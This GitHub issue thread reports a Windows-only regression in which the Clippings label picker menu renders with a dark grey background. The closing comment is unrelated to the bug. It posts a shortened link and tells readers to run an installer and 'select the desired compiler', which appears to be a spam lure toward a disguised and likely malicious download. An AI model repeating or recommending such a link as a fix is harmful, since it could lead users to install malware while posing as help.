### ISSUE TITLE
Label picker menu background too dark

### ISSUE THREAD

**Issue by aecreations** [aecreations/clippings-tb#190]
A regression issue caused by removal of the enhanced UI styling. The clipping label menu background is a dark grey color, and it is applied to the individual label colours instead of to the menu itself. This is occurring on Windows but not on macOS.

This needs to be fixed in Clippings Manager and the New Clipping dialog.

![image](https://github.com/user-attachments/assets/fa51dba4-d1d5-460f-b26f-d20430a95e50)

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
